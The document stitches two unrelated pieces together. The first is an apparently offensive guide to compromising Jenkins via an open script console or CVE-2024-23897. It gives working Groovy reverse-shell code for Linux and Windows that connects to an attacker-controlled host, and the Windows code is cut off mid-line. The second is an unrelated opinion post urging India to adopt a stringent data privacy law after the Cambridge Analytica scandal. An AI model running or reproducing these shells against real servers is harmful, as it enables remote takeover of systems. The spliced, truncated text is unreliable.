Exploiting Jenkins / CVE-2024-23897
Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script
If you don't have access to script console and the version is vulnerable to CVE-2024-23897, then exploit it to read files and get authentication credentials for Jenkins (explained below).
Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script.
For Linux,
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
For Windows,
String host="YOUR_IP";
int port=PORT;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStrea
Cambridge Analytica and Information Technology Act of India: Why India needs a Stringent Data Privacy Law?
For the last few days, the Cambridge Analytica scandal has been shaking governments around the world. It is also in the news that CA/FB or its partners were allegedly actively involved in different elections in India.
Let’s see how practical it is to punish CA/FB or any other organization that violates data privacy.
Currently, data protection in India is governed by provisions of the Information Technology Act, 2008. So if the Cambridge Analytica scandal is taken to court, the only way it can be dealt with is by using India's Information Technology Act.
Here is the response of India’s Union Minister to the Cambridge Analytica scandal.
“Mr Mark Zuckerberg, you better note the observation of the IT Minister of India. We welcome the FB profile in India, but if any data theft of Indians is done through the collusion of Facebook's system, it shall not be tolerated. We have got stringent powers in the IT Act, and we shall use it, including to summon you in India,”
In fact, India lacks stringent data privacy laws like the EU-DPD/GDPR.
In reality, the statement means nothing, because there is no way to summon Zuckerberg, assuming his company is accused of breach of privacy.
This is because India doesn’t have any stringent law for data protection. There is nothing in Indian law that currently stops intermediaries from selling profiles of their clients to whoever is willing to pay. It is known that banks, mobile operators, Internet providers and several other agencies misuse the individual data available with them. Whenever we sign up with some service on the Internet (e.g., social media, job portals), we can expect new mails/calls from other organizations offering their services. Though they mention all this in the Terms and Services, how many of us spend time reading and understanding it? Everyone simply accepts and clicks forward.
Also, the Minister's anger over privacy seems funny, because he had once argued in the Supreme Court that there is no such thing as an absolute right to privacy. According to the Government, privacy “should be subject to reasonable restrictions,” adding that the state’s concerns should override the privacy rights of individuals.
In the light of recent events such as the Aadhaar data misuse and now Cambridge Analytica, it is obvious that what India needs is a stringent law and fool-proof systems to protect private data.
The entire world is preparing, or has already established, laws to protect its citizens' data and privacy; as the fastest-growing economy, India should step up with stringent data privacy laws.
Note: Many Indian business persons took loans and left India. The Government was never able to bring them back here, so imagine how it can bring Zuckerberg in under a weak IT Act? Lol.